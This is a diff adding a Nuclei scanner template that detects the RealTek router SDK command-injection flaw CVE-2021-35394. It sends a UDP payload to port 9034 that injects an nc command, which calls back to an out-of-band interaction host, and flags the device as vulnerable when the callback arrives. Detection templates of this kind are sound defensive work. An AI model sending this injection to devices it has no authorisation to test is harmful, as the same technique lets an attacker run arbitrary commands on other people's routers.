projectdiscovery · king-alexander · Oct 10, 2023 · Nov 2, 2023 · Apr 2, 2024 · Apr 2, 2024
diff --git a/javascript/cves/2021/CVE-2021-35394.yaml b/javascript/cves/2021/CVE-2021-35394.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-35394
+
+info:
+  name: RealTek AP Router SDK - Arbitrary Command Injection
+  author: king-alexander
+  severity: critical
+  remediation: Apply the latest security patches or updates provided by RealTek.
+  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
+    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
+  tags: cve,cve2021,realtek,rce,kev
+
+javascript:
+  - code: |
+      const net = require('nuclei/net');
+      const conn = net.Open('udp', `${Host}:${Port}`);
+      conn.Send('orf;nc -u {{interactsh-url}}');
+    args:
+      Host: "{{Host}}:9034"
+      Port: 9034
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: dsl
+        dsl:
+          - success == true
+        condition: and